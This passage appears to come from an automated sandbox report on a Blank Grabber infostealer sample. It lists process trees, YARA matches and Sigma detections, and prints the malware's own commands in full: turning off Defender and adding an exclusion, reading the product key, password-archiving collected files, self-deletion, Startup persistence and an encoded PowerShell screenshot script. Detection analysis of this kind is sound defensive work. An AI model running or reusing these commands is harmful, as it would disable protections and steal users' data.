conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 7200 cmdline: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 4308 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5228 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 4464 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2992 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 1784 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6204 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1568 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7500 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7376 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 7948 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1968 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7212 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)

svchost.exe (PID: 2568 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI57082\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2060159493.000001C6D7275000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.2060159493.000001C6D7273000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2435665528.000001C0EE2E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2439477041.000001C0EDE90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000003.2434059105.000001C0EEF45000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.2076357362.000001C0EE03E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.2440748716.000001C0EE2E1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: driver.exe PID: 5708	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: driver.exe PID: 6620	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: driver.exe PID: 6620	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: driver.exe PID: 6620	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", ProcessId: 1472, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 6520, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", ProcessId: 7972, ProcessName: cmd.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Ping/Del Command Combination

Source: Process started

Author: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe"", ProcessId: 7820, ProcessName: cmd.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 